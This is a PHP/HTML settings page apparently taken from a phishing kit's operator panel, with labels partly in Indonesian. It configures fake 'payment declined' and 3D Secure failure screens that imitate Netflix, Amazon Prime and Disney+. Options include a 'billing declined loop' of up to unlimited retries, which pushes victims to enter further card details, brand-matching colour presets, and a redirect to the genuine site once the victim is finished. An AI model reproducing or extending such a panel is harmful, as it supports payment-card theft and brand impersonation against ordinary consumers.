                                <div class="preview-box" style="border-left: 3px solid var(--accent-red);">
                                    <div class="preview-icon filled">!</div>
                                    <div class="preview-msg">Payment Method Updated</div>
                                    <div class="preview-sub">✕ Declined: VISA ****1234</div>
                                </div>
                            </div>
                            <!-- Template 4 -->
                            <div class="template-preview recommended">
                                <div class="preview-title">Template 4 - Centered <span style="color: var(--accent-yellow);">⭐</span></div>
                                <div class="preview-box">
                                    <div class="preview-icon centered">✕</div>
                                    <div class="preview-msg">Payment Unsuccessful</div>
                                    <div class="preview-sub">VISA ****1234 (BANK)</div>
                                    <div class="preview-link">Please try another card</div>
                                </div>
                            </div>
                            <!-- Template 5 -->
                            <div class="template-preview">
                                <div class="preview-title">Template 5 - Full Width</div>
                                <div class="preview-box" style="background: #fff0f0;">
                                    <div class="preview-icon filled" style="background: var(--accent-blue);">✕</div>
                                    <div class="preview-msg" style="color: var(--accent-red);">Payment Failed</div>
                                    <div class="preview-sub">VISA ****1234 (BANK)</div>
                                    <div class="preview-link">Please try another card</div>
                                </div>
                            </div>
                            <!-- Template 6 - 3D Secure Failed -->
                            <div class="template-preview">
                                <div class="preview-title">Template 6 - 3D Secure</div>
                                <div class="preview-box" style="background: #ffeaea; border: 1px solid #f5c6c6;">
                                    <div class="preview-icon" style="background: #fef2f2; color: #e50914; font-size: 14px;">🔒</div>
                                    <div class="preview-msg" style="color: #221f1f; font-weight: 600; font-size: 10px;">Your payment was declined</div>
                                    <div class="preview-sub" style="color: #333; font-size: 8px;">VISA ****1234 was not accepted</div>
                                </div>
                            </div>
                            <!-- Template 7 - Netflix Border -->
                            <div class="template-preview recommended">
                                <div class="preview-title">Template 7 - Netflix Border <span style="color: var(--accent-yellow);">⭐</span></div>
                                <div class="preview-box" style="background: #ffebed; border-left: 4px solid #e50914; border-radius: 4px; padding: 8px 10px;">
                                    <div style="display: flex; align-items: center; gap: 8px;">
                                        <div style="width: 14px; height: 14px; background: #e50914; border-radius: 50%; display: flex; align-items: center; justify-content: center;">
                                            <span style="color: #fff; font-size: 8px; font-weight: bold;">!</span>
                                        </div>
                                        <div style="color: #221f1f; font-size: 8px;"><strong>Your payment was declined.</strong> VISA ending in 1234...</div>
                                    </div>
                                </div>
                            </div>
                            <!-- Template 8 - Netflix Banner -->
                            <div class="template-preview recommended">
                                <div class="preview-title">Template 8 - Netflix Banner <span style="color: var(--accent-yellow);">⭐⭐</span></div>
                                <div class="preview-box" style="background: #fff4f4; border: 1px solid #fcd9d9; border-radius: 4px; padding: 10px;">
                                    <div style="display: flex; align-items: flex-start; gap: 8px;">
                                        <div style="width: 14px; height: 14px; background: #e50914; border-radius: 50%; display: flex; align-items: center; justify-content: center; flex-shrink: 0;">
                                            <span style="color: #fff; font-size: 8px; font-weight: bold;">!</span>
                                        </div>
                                        <div>
                                            <div style="color: #111; font-size: 9px; font-weight: 600;">We were unable to process your payment</div>
                                            <div style="color: #333; font-size: 8px;">VISA ending in 1234 was declined.</div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <!-- Template 9 - Netflix Inline -->
                            <div class="template-preview">
                                <div class="preview-title">Template 9 - Netflix Inline <span style="color: var(--accent-yellow);">⭐</span></div>
                                <div class="preview-box" style="background: #fae5e5; border-radius: 2px; padding: 8px 10px;">
                                    <div style="color: #b81d24; font-size: 9px;"><strong>Payment declined:</strong> Your VISA ending in 1234 could not be charged.</div>
                                </div>
                            </div>
                            <!-- Template 10 - Netflix Card -->
                            <div class="template-preview recommended">
                                <div class="preview-title">Template 10 - Netflix Card <span style="color: var(--accent-yellow);">⭐⭐</span></div>
                                <div class="preview-box" style="background: #fff; border-radius: 4px; box-shadow: 0 1px 3px rgba(0,0,0,.15); padding: 10px;">
                                    <div style="display: flex; align-items: flex-start; gap: 8px;">
                                        <div style="width: 24px; height: 24px; background: #fce4e4; border-radius: 50%; display: flex; align-items: center; justify-content: center;">
                                            <span style="color: #e50914; font-size: 12px;">✕</span>
                                        </div>
                                        <div>
                                            <div style="color: #141414; font-size: 10px; font-weight: 700;">Payment unsuccessful</div>
                                            <div style="color: #e50914; font-size: 8px;">VISA ****1234 was declined</div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <!-- Template 11 - Subscription Alert -->
                            <div class="template-preview recommended">
                                <div class="preview-title">Template 11 - Subscription Alert <span style="color: var(--accent-yellow);">⭐⭐</span></div>
                                <div class="preview-box" style="background: #fff; border-radius: 4px; overflow: hidden; box-shadow: 0 1px 3px rgba(0,0,0,.15);">
                                    <div style="background: #e50914; padding: 6px 10px; display: flex; align-items: center; gap: 6px;">
                                        <span style="color: #fff; font-size: 8px;">⚠</span>
                                        <span style="color: #fff; font-size: 8px; font-weight: 600;">Payment for your Netflix subscription failed</span>
                                    </div>
                                    <div style="padding: 8px 10px;">
                                        <div style="background: #f5f5f5; border-radius: 3px; padding: 5px 8px; display: flex; justify-content: space-between; margin-bottom: 6px;">
                                            <span style="font-size: 7px; font-weight: 600; color: #333;">Standard - $15.49/mo</span>
                                            <span style="font-size: 7px; font-weight: 600; color: #e50914;">PAYMENT FAILED</span>
                                        </div>
                                        <div style="display: flex; align-items: center; gap: 6px; padding-bottom: 6px; border-bottom: 1px solid #eee;">
                                            <span style="font-size: 8px; color: #333; font-weight: 500;">VISA (BANK)</span>
                                            <span style="font-size: 7px; color: #e50914; margin-left: auto;">Declined</span>
                                        </div>
                                        <p style="font-size: 7px; color: #666; margin: 6px 0 0; line-height: 1.4;">We were unable to process the payment for your subscription.</p>
                                    </div>
                                </div>
                            </div>
                            <!-- Template 12 - Billing Alert Dark -->
                            <div class="template-preview">
                                <div class="preview-title">Template 12 - Billing Alert Dark <span style="color: var(--accent-yellow);">⭐</span></div>
                                <div class="preview-box" style="background: #1a1a2e; border-radius: 6px; padding: 10px; box-shadow: 0 1px 3px rgba(0,0,0,.3);">
                                    <div style="display: flex; align-items: center; gap: 6px; margin-bottom: 6px;">
                                        <span style="color: #e50914; font-size: 10px;">⚠</span>
                                        <span style="color: #fff; font-size: 9px; font-weight: 600;">Billing Alert</span>
                                    </div>
                                    <div style="color: #aaa; font-size: 7px; margin-bottom: 4px;">VISA ****1234 was declined</div>
                                    <div style="color: #666; font-size: 7px;">Please update your payment information.</div>
                                </div>
                            </div>
                            <!-- Template 13 - Account Hold -->
                            <div class="template-preview recommended">
                                <div class="preview-title">Template 13 - Account Hold <span style="color: var(--accent-yellow);">⭐⭐</span></div>
                                <div class="preview-box" style="background: #fff; border-radius: 4px; overflow: hidden; box-shadow: 0 1px 3px rgba(0,0,0,.15);">
                                    <div style="background: #e50914; padding: 8px 10px; text-align: center;">
                                        <div style="color: #fff; font-size: 10px; font-weight: 700;">Account On Hold</div>
                                        <div style="color: rgba(255,255,255,.8); font-size: 7px;">Subscription payment could not be processed</div>
                                    </div>
                                    <div style="padding: 8px 10px; text-align: center;">
                                        <div style="font-size: 8px; color: #333; font-weight: 500;">VISA ****1234</div>
                                        <span style="font-size: 7px; color: #e50914;">Declined</span>
                                    </div>
                                </div>
                            </div>
                            <!-- Template 14 - Dark Modal -->
                            <div class="template-preview recommended">
                                <div class="preview-title">Template 14 - Dark Modal <span style="color: var(--accent-yellow);">⭐⭐</span></div>
                                <div class="preview-box" style="background: #141414; border-radius: 8px; padding: 12px; box-shadow: 0 2px 8px rgba(0,0,0,.5);">
                                    <div style="text-align: center; margin-bottom: 6px;">
                                        <span style="color: #e50914; font-size: 16px;">⚠</span>
                                    </div>
                                    <div style="color: #fff; font-size: 9px; font-weight: 600; text-align: center; margin-bottom: 4px;">Payment Declined</div>
                                    <div style="color: #999; font-size: 7px; text-align: center;">VISA ****1234 • Declined</div>
                                </div>
                            </div>
                            <!-- Template 15 - Checkout Error -->
                            <div class="template-preview">
                                <div class="preview-title">Template 15 - Checkout Error <span style="color: var(--accent-yellow);">⭐</span></div>
                                <div class="preview-box" style="background: #fff; border-radius: 4px; border: 1px solid #e6e6e6; padding: 10px;">
                                    <div style="border-left: 3px solid #e50914; padding-left: 8px;">
                                        <div style="color: #e50914; font-size: 9px; font-weight: 600; margin-bottom: 2px;">Checkout Error</div>
                                        <div style="color: #333; font-size: 7px;">VISA ****1234 was declined</div>
                                        <div style="color: #666; font-size: 7px; margin-top: 2px;">Please use a different payment method.</div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
        <?php elseif ($activeTemplate === 'etmin'): ?>
        <!-- AMAZON PRIME DECLINED SETTINGS -->
        <div class="settings-card" style="border-color: rgba(255, 153, 0, 0.3);">
            <div class="settings-card-header" style="background: rgba(255, 153, 0, 0.08);">
                <i class="bi bi-x-circle-fill icon" style="color: #ff9900;"></i>
                <span class="title" style="color: #ff9900;">DECLINED CARD TEMPLATE - Amazon Prime</span>
                <span class="badge" style="background: rgba(255, 153, 0, 0.1); color: #ff9900; border-color: rgba(255, 153, 0, 0.3);">KHUSUS AMAZON</span>
            </div>
            <div class="settings-card-body">
                <div class="form-row cols-2" style="margin-bottom: 16px;">
                    <div class="form-group">
                        <label class="form-label">DECLINED TEMPLATE</label>
                        <select name="amazon_declined_template" class="form-select">
                            <option value="1" <?= ($genConfig['amazon_declined_template'] ?? '1') === '1' ? 'selected' : '' ?>>Template 1 - Classic Alert Box</option>
                            <option value="2" <?= ($genConfig['amazon_declined_template'] ?? '') === '2' ? 'selected' : '' ?>>Template 2 - Orange Warning Banner</option>
                            <option value="3" <?= ($genConfig['amazon_declined_template'] ?? '') === '3' ? 'selected' : '' ?>>Template 3 - Red Left Border</option>
                            <option value="4" <?= ($genConfig['amazon_declined_template'] ?? '') === '4' ? 'selected' : '' ?>>Template 4 - Card Detail Box</option>
                            <option value="5" <?= ($genConfig['amazon_declined_template'] ?? '') === '5' ? 'selected' : '' ?>>Template 5 - Full Width Red Banner</option>
                            <option value="6" <?= ($genConfig['amazon_declined_template'] ?? '') === '6' ? 'selected' : '' ?>>Template 6 - Centered Icon</option>
                            <option value="7" <?= ($genConfig['amazon_declined_template'] ?? '') === '7' ? 'selected' : '' ?>>Template 7 - Split Two Column</option>
                            <option value="8" <?= ($genConfig['amazon_declined_template'] ?? '') === '8' ? 'selected' : '' ?>>Template 8 - Minimal Inline</option>
                            <option value="9" <?= ($genConfig['amazon_declined_template'] ?? '') === '9' ? 'selected' : '' ?>>Template 9 - Amazon Dark Theme</option>
                            <option value="10" <?= ($genConfig['amazon_declined_template'] ?? '') === '10' ? 'selected' : '' ?>>Template 10 - Compact Detail Table</option>
                            <option value="11" <?= ($genConfig['amazon_declined_template'] ?? '') === '11' ? 'selected' : '' ?>>Template 11 - Step Progress</option>
                            <option value="12" <?= ($genConfig['amazon_declined_template'] ?? '') === '12' ? 'selected' : '' ?>>Template 12 - Prime Branded</option>
                            <option value="13" <?= ($genConfig['amazon_declined_template'] ?? '') === '13' ? 'selected' : '' ?>>Template 13 - Notification Toast</option>
                            <option value="14" <?= ($genConfig['amazon_declined_template'] ?? '') === '14' ? 'selected' : '' ?>>Template 14 - Modal Dialog</option>
                            <option value="15" <?= ($genConfig['amazon_declined_template'] ?? '') === '15' ? 'selected' : '' ?>>Template 15 - Checkout Error</option>
                        </select>
                        <span class="form-hint">Pilih style untuk card declined Amazon</span>
                    </div>
                    <div class="form-group">
                        <label class="form-label">3D SECURE VERIFICATION</label>
                        <div style="display: flex; align-items: center; gap: 12px; margin-bottom: 10px;">
                            <label class="toggle-switch">
                                <input type="hidden" name="amazon_3ds_status" value="off">
                                <input type="checkbox" name="amazon_3ds_status" value="on" <?= ($genConfig['amazon_3ds_status'] ?? 'off') === 'on' ? 'checked' : '' ?>>
                                <span class="toggle-slider"></span>
                            </label>
                            <span style="font-size: 0.85rem; color: <?= ($genConfig['amazon_3ds_status'] ?? 'off') === 'on' ? '#00ff9d' : '#ff4757' ?>;">
                                <?= ($genConfig['amazon_3ds_status'] ?? 'off') === 'on' ? 'ON - 3DS aktif' : 'OFF - Tanpa 3DS' ?>
                            </span>
                        </div>
                    </div>
                    <div class="form-group" id="amazon_3ds_options" style="<?= ($genConfig['amazon_3ds_status'] ?? 'off') === 'off' ? 'display:none;' : '' ?>">
                        <label class="form-label">3DS FAILED TEMPLATE</label>
                        <select name="amazon_3ds_template" class="form-select">
                            <option value="1" <?= ($genConfig['amazon_3ds_template'] ?? '1') === '1' ? 'selected' : '' ?>>Template 1 - Classic Alert</option>
                            <option value="2" <?= ($genConfig['amazon_3ds_template'] ?? '') === '2' ? 'selected' : '' ?>>Template 2 - Shield Warning</option>
                            <option value="3" <?= ($genConfig['amazon_3ds_template'] ?? '') === '3' ? 'selected' : '' ?>>Template 3 - Step Progress</option>
                            <option value="4" <?= ($genConfig['amazon_3ds_template'] ?? '') === '4' ? 'selected' : '' ?>>Template 4 - Dark Theme Lock</option>
                            <option value="5" <?= ($genConfig['amazon_3ds_template'] ?? '') === '5' ? 'selected' : '' ?>>Template 5 - Modal Dialog</option>
                        </select>
                        <span class="form-hint">Pilih style untuk 3DS failed Amazon</span>
                    </div>
                    <script>document.querySelector('input[name="amazon_3ds_status"][type="checkbox"]').addEventListener('change',function(){document.getElementById('amazon_3ds_options').style.display=this.checked?'':'none';});</script>
                </div>
                
                <div class="form-row cols-3" style="margin-bottom: 16px;">
                    <div class="form-group">
                        <label class="form-label">ERROR MESSAGE (DECLINED)</label>
                        <select name="amazon_error_message" class="form-select">
                            <option value="verification_failed" <?= ($genConfig['amazon_error_message'] ?? 'verification_failed') === 'verification_failed' ? 'selected' : '' ?>>Card Verification Failed</option>
                            <option value="payment_declined" <?= ($genConfig['amazon_error_message'] ?? '') === 'payment_declined' ? 'selected' : '' ?>>Your payment method was declined</option>
                            <option value="unable_process" <?= ($genConfig['amazon_error_message'] ?? '') === 'unable_process' ? 'selected' : '' ?>>Unable to process your payment</option>
                            <option value="card_declined" <?= ($genConfig['amazon_error_message'] ?? '') === 'card_declined' ? 'selected' : '' ?>>Your card was declined</option>
                            <option value="transaction_failed" <?= ($genConfig['amazon_error_message'] ?? '') === 'transaction_failed' ? 'selected' : '' ?>>Transaction could not be completed</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">BILLING DECLINED LOOP</label>
                        <select name="billing_declined" class="form-select">
                            <option value="1" <?= ($genConfig['billing_declined'] ?? '1') === '1' ? 'selected' : '' ?>>1x</option>
                            <option value="2" <?= ($genConfig['billing_declined'] ?? '') === '2' ? 'selected' : '' ?>>2x</option>
                            <option value="3" <?= ($genConfig['billing_declined'] ?? '') === '3' ? 'selected' : '' ?>>3x</option>
                            <option value="99" <?= ($genConfig['billing_declined'] ?? '') === '99' ? 'selected' : '' ?>>Unlimited</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">REDIRECT COMPLETED</label>
                        <input type="url" name="redirect_link" class="form-input" value="<?= htmlspecialchars($genConfig['redirect_completed_link'] ?? 'https://amazon.com') ?>" placeholder="https://amazon.com">
                    </div>
                </div>
            </div>
        </div>
        
        <?php elseif ($activeTemplate === 'disney'): ?>
        <!-- DISNEY+ DECLINED SETTINGS -->
        <div class="settings-card" style="border-color: rgba(77, 124, 255, 0.3);">
            <div class="settings-card-header" style="background: rgba(77, 124, 255, 0.08);">
                <i class="bi bi-x-circle-fill icon" style="color: #4d7cff;"></i>
                <span class="title" style="color: #4d7cff;">DECLINED CARD TEMPLATE - Disney+</span>
                <span class="badge" style="background: rgba(77, 124, 255, 0.1); color: #4d7cff; border-color: rgba(77, 124, 255, 0.3);">KHUSUS DISNEY+</span>
            </div>
            <div class="settings-card-body">
                <!-- Template Selection -->
                <div class="form-row cols-2" style="margin-bottom: 20px;">
                    <div class="form-group">
                        <label class="form-label">DECLINED TEMPLATE</label>
                        <select name="disney_declined_template" class="form-select">
                            <option value="1" <?= ($genConfig['disney_declined_template'] ?? '1') === '1' ? 'selected' : '' ?>>Template 1 - Border Kiri Merah</option>
                            <option value="2" <?= ($genConfig['disney_declined_template'] ?? '') === '2' ? 'selected' : '' ?>>Template 2 - Icon Bulat Filled</option>
                            <option value="3" <?= ($genConfig['disney_declined_template'] ?? '') === '3' ? 'selected' : '' ?>>Template 3 - Icon Circle Outline</option>
                            <option value="4" <?= ($genConfig['disney_declined_template'] ?? '') === '4' ? 'selected' : '' ?>>Template 4 - Centered Alert</option>
                            <option value="5" <?= ($genConfig['disney_declined_template'] ?? '') === '5' ? 'selected' : '' ?>>Template 5 - Full Width Banner</option>
                            <option value="6" <?= ($genConfig['disney_declined_template'] ?? '') === '6' ? 'selected' : '' ?>>Template 6 - Modern Card Glass</option>
                            <option value="7" <?= ($genConfig['disney_declined_template'] ?? '') === '7' ? 'selected' : '' ?>>Template 7 - Compact Detail</option>
                            <option value="8" <?= ($genConfig['disney_declined_template'] ?? '') === '8' ? 'selected' : '' ?>>Template 8 - Inline Alert</option>
                            <option value="9" <?= ($genConfig['disney_declined_template'] ?? '') === '9' ? 'selected' : '' ?>>Template 9 - Accent Bar Centered</option>
                            <option value="10" <?= ($genConfig['disney_declined_template'] ?? '') === '10' ? 'selected' : '' ?>>Template 10 - Card Detail Box</option>
                            <option value="11" <?= ($genConfig['disney_declined_template'] ?? '') === '11' ? 'selected' : '' ?>>Template 11 - Compact Detail Table</option>
                            <option value="12" <?= ($genConfig['disney_declined_template'] ?? '') === '12' ? 'selected' : '' ?>>Template 12 - Split Two Panel</option>
                            <option value="13" <?= ($genConfig['disney_declined_template'] ?? '') === '13' ? 'selected' : '' ?>>Template 13 - Minimal Single Line</option>
                            <option value="14" <?= ($genConfig['disney_declined_template'] ?? '') === '14' ? 'selected' : '' ?>>Template 14 - Top Banner Notification</option>
                            <option value="15" <?= ($genConfig['disney_declined_template'] ?? '') === '15' ? 'selected' : '' ?>>Template 15 - Modal Dialog</option>
                        </select>
                        <span class="form-hint">Pilih style untuk card declined</span>
                    </div>
                    <div class="form-group">
                        <label class="form-label">3D SECURE VERIFICATION</label>
                        <div style="display: flex; align-items: center; gap: 12px; margin-bottom: 10px;">
                            <label class="toggle-switch">
                                <input type="hidden" name="disney_3ds_status" value="off">
                                <input type="checkbox" name="disney_3ds_status" value="on" <?= ($genConfig['disney_3ds_status'] ?? 'off') === 'on' ? 'checked' : '' ?>>
                                <span class="toggle-slider"></span>
                            </label>
                            <span style="font-size: 0.85rem; color: <?= ($genConfig['disney_3ds_status'] ?? 'off') === 'on' ? '#00ff9d' : '#ff4757' ?>;">
                                <?= ($genConfig['disney_3ds_status'] ?? 'off') === 'on' ? 'ON - 3DS aktif' : 'OFF - Tanpa 3DS' ?>
                            </span>
                        </div>
                    </div>
                    <div class="form-group" id="disney_3ds_options" style="<?= ($genConfig['disney_3ds_status'] ?? 'off') === 'off' ? 'display:none;' : '' ?>">
                        <label class="form-label">3DS FAILED TEMPLATE</label>
                        <select name="disney_3ds_template" class="form-select">
                            <option value="1" <?= ($genConfig['disney_3ds_template'] ?? '1') === '1' ? 'selected' : '' ?>>Template 1 - Simple (Title Merah)</option>
                            <option value="2" <?= ($genConfig['disney_3ds_template'] ?? '') === '2' ? 'selected' : '' ?>>Template 2 - Icon Bulat Filled</option>
                            <option value="3" <?= ($genConfig['disney_3ds_template'] ?? '') === '3' ? 'selected' : '' ?>>Template 3 - Shield Verification</option>
                            <option value="4" <?= ($genConfig['disney_3ds_template'] ?? '') === '4' ? 'selected' : '' ?>>Template 4 - Lock Security Banner</option>
                            <option value="5" <?= ($genConfig['disney_3ds_template'] ?? '') === '5' ? 'selected' : '' ?>>Template 5 - Modal Alert</option>
                        </select>
                        <span class="form-hint">Pilih style untuk 3DS failed</span>
                    </div>
                    <script>document.querySelector('input[name="disney_3ds_status"][type="checkbox"]').addEventListener('change',function(){document.getElementById('disney_3ds_options').style.display=this.checked?'':'none';});</script>
                </div>
                
                <div class="form-row cols-3" style="margin-bottom: 20px;">
                    <div class="form-group">
                        <label class="form-label">ERROR MESSAGE (DECLINED)</label>
                        <select name="disney_error_message" class="form-select" onchange="updateDisneyErrorMessage()">
                            <option value="couldnt_process" <?= ($genConfig['disney_error_message'] ?? 'couldnt_process') === 'couldnt_process' ? 'selected' : '' ?>>We couldn't process your payment</option>
                            <option value="payment_declined" <?= ($genConfig['disney_error_message'] ?? '') === 'payment_declined' ? 'selected' : '' ?>>Your payment was declined</option>
                            <option value="payment_unsuccessful" <?= ($genConfig['disney_error_message'] ?? '') === 'payment_unsuccessful' ? 'selected' : '' ?>>Payment unsuccessful</option>
                            <option value="card_declined" <?= ($genConfig['disney_error_message'] ?? '') === 'card_declined' ? 'selected' : '' ?>>Your card was declined</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">COLOR MODE</label>
                        <select name="disney_color_mode" id="disneyColorMode" class="form-select" onchange="toggleDisneyColorSettings()">
                            <option value="default" <?= ($genConfig['disney_color_mode'] ?? 'default') === 'default' ? 'selected' : '' ?>>🎨 Default (Disney+ Asli)</option>
                            <option value="custom" <?= ($genConfig['disney_color_mode'] ?? '') === 'custom' ? 'selected' : '' ?>>⚙️ Custom (Atur Manual)</option>
                        </select>
                        <span class="form-hint">Default = warna bawaan Disney+</span>
                    </div>
                </div>
                
                <!-- Color Settings -->
                <div id="disneyColorSettings" style="padding: 16px; background: #0e1524; border-radius: 8px; border: 1px solid #2a2f3d; <?= ($genConfig['disney_color_mode'] ?? 'default') === 'default' ? 'display:none;' : '' ?>">
                    <label class="form-label" style="color: #0063e5; margin-bottom: 12px;">🎨 CUSTOM COLOR SETTINGS</label>
                    
                    <div style="display: grid; grid-template-columns: repeat(4, 1fr); gap: 12px;">
                        <div>
                            <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Card Background</label>
                            <div style="display: flex; gap: 6px; align-items: center;">
                                <input type="color" name="disney_color_bg" id="disneyColorBg" value="<?= htmlspecialchars($genConfig['disney_color_bg'] ?? '#1a1d29') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                <input type="text" name="disney_color_bg_text" value="<?= htmlspecialchars($genConfig['disney_color_bg'] ?? '#1a1d29') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#1a1d29">
                            </div>
                        </div>
                        <div>
                            <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Error/Accent</label>
                            <div style="display: flex; gap: 6px; align-items: center;">
                                <input type="color" name="disney_color_error" id="disneyColorError" value="<?= htmlspecialchars($genConfig['disney_color_error'] ?? '#f9423a') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                <input type="text" name="disney_color_error_text" value="<?= htmlspecialchars($genConfig['disney_color_error'] ?? '#f9423a') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#f9423a">
                            </div>
                        </div>
                        <div>
                            <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Title Text</label>
                            <div style="display: flex; gap: 6px; align-items: center;">
                                <input type="color" name="disney_color_title" id="disneyColorTitle" value="<?= htmlspecialchars($genConfig['disney_color_title'] ?? '#f9f9f9') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                <input type="text" name="disney_color_title_text" value="<?= htmlspecialchars($genConfig['disney_color_title'] ?? '#f9f9f9') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#f9f9f9">
                            </div>
                        </div>
                        <div>
                            <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Sub Text</label>
                            <div style="display: flex; gap: 6px; align-items: center;">
                                <input type="color" name="disney_color_sub" id="disneyColorSub" value="<?= htmlspecialchars($genConfig['disney_color_sub'] ?? '#cacaca') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                <input type="text" name="disney_color_sub_text" value="<?= htmlspecialchars($genConfig['disney_color_sub'] ?? '#cacaca') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#cacaca">
                            </div>
                        </div>
                    </div>
                    
                    <div style="display: grid; grid-template-columns: repeat(3, 1fr); gap: 12px; margin-top: 12px;">
                        <div>
                            <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Muted/Context Text</label>
                            <div style="display: flex; gap: 6px; align-items: center;">
                                <input type="color" name="disney_color_muted" id="disneyColorMuted" value="<?= htmlspecialchars($genConfig['disney_color_muted'] ?? '#a0a0a0') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                <input type="text" name="disney_color_muted_text" value="<?= htmlspecialchars($genConfig['disney_color_muted'] ?? '#a0a0a0') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#a0a0a0">
                            </div>
                        </div>
                        <div>
                            <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">CTA/Action Text</label>
                            <div style="display: flex; gap: 6px; align-items: center;">
                                <input type="color" name="disney_color_cta" id="disneyColorCta" value="<?= htmlspecialchars($genConfig['disney_color_cta'] ?? '#cacaca') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                <input type="text" name="disney_color_cta_text" value="<?= htmlspecialchars($genConfig['disney_color_cta'] ?? '#cacaca') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#cacaca">
                            </div>
                        </div>
                        <div>
                            <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Inner Box</label>
                            <div style="display: flex; gap: 6px; align-items: center;">
                                <input type="color" name="disney_color_inner" id="disneyColorInner" value="<?= htmlspecialchars($genConfig['disney_color_inner'] ?? '#0e1524') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                <input type="text" name="disney_color_inner_text" value="<?= htmlspecialchars($genConfig['disney_color_inner'] ?? '#0e1524') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#0e1524">
                            </div>
                        </div>
                    </div>
                    
                    <!-- Quick Presets -->
                    <div style="margin-top: 12px; padding-top: 12px; border-top: 1px solid #2a2f3d;">
                        <label style="font-size: 11px; color: #888; display: block; margin-bottom: 8px;">Quick Presets:</label>
                        <div style="display: flex; gap: 8px; flex-wrap: wrap;">
                            <button type="button" onclick="setDisneyPreset('disney')" style="padding: 6px 12px; background: #0063e5; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-size: 11px;">Disney+ Default</button>
                            <button type="button" onclick="setDisneyPreset('dark')" style="padding: 6px 12px; background: #1a1a1a; color: #fff; border: 1px solid #333; border-radius: 4px; cursor: pointer; font-size: 11px;">Dark</button>
                            <button type="button" onclick="setDisneyPreset('light')" style="padding: 6px 12px; background: #f5f5f5; color: #333; border: 1px solid #ddd; border-radius: 4px; cursor: pointer; font-size: 11px;">Light</button>
                            <button type="button" onclick="setDisneyPreset('netflix')" style="padding: 6px 12px; background: #e50914; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-size: 11px;">Netflix Style</button>
                        </div>
                    </div>
                </div>
                
                <!-- Live Preview -->
                <div style="margin-top: 16px; padding: 16px; background: #040714; border-radius: 8px;">
                    <label class="form-label" style="color: #cacaca; margin-bottom: 12px;">LIVE PREVIEW</label>
                    <div id="disneyPreviewBox" style="background:#1a1d29;border-radius:4px;padding:16px">
                        <div style="display:flex;align-items:flex-start;gap:12px">
                            <svg width="20" height="20" viewBox="0 0 20 20" fill="none" style="flex-shrink:0;margin-top:2px">
                                <circle cx="10" cy="10" r="9" stroke="#f9423a" stroke-width="1.5"/>
                                <path d="M10 6v5m0 2v1" stroke="#f9423a" stroke-width="1.5" stroke-linecap="round"/>
                            </svg>
                            <div>
                                <p id="disneyPreviewTitle" style="color:#f9f9f9;font-size:14px;font-weight:500;margin:0 0 4px">We couldn't process your payment</p>
                                <p id="disneyPreviewSub" style="color:#cacaca;font-size:13px;margin:0 0 6px">Your Visa ending in 4242 was declined.</p>
                                <p id="disneyPreviewCta" style="color:#cacaca;font-size:12px;margin:0">Please try a different card.</p>
                            </div>
                        </div>
                    </div>
                </div>
                
                <div style="margin-top: 15px; padding: 12px; background: rgba(0, 99, 229, 0.1); border-radius: 8px; border: 1px solid rgba(0, 99, 229, 0.2);">
                    <p style="color: #0063e5; font-size: 12px; margin: 0;">
                        <i class="bi bi-info-circle"></i> Preview templates: 
                        <a href="../irjBhq6Esw/debug-declined-150.php" target="_blank" style="color: #0063e5; text-decoration: underline;">Debug 150 Templates</a>
                    </p>
                </div>
            </div>
        </div>
        
        <?php else: ?>
        <!-- Other templates: Simple declined settings -->
        <div class="settings-card declined">
            <div class="settings-card-header">
                <i class="bi bi-x-circle-fill icon"></i>
                <span class="title">DECLINED SETTINGS - <?= htmlspecialchars($activeTemplateName) ?></span>
                <span class="badge">→ GEN.JSON</span>
                <span class="template-name">(Khusus <?= htmlspecialchars($activeTemplateName) ?>)</span>
            </div>
            <div class="settings-card-body">
                <div class="form-row cols-2">
                    <div class="form-group">
                        <label class="form-label">BILLING DECLINED LOOP</label>
                        <select name="billing_declined" class="form-select">
                            <option value="1" <?= ($genConfig['billing_declined'] ?? '1') === '1' ? 'selected' : '' ?>>1x</option>
                            <option value="2" <?= ($genConfig['billing_declined'] ?? '') === '2' ? 'selected' : '' ?>>2x</option>
                            <option value="3" <?= ($genConfig['billing_declined'] ?? '') === '3' ? 'selected' : '' ?>>3x</option>
                            <option value="99" <?= ($genConfig['billing_declined'] ?? '') === '99' ? 'selected' : '' ?>>Unlimited</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">REDIRECT COMPLETED LINK</label>
                        <input type="url" name="redirect_link" class="form-input" value="<?= htmlspecialchars($genConfig['redirect_completed_link'] ?? '') ?>" placeholder="https://example.com">
                    </div>
                </div>
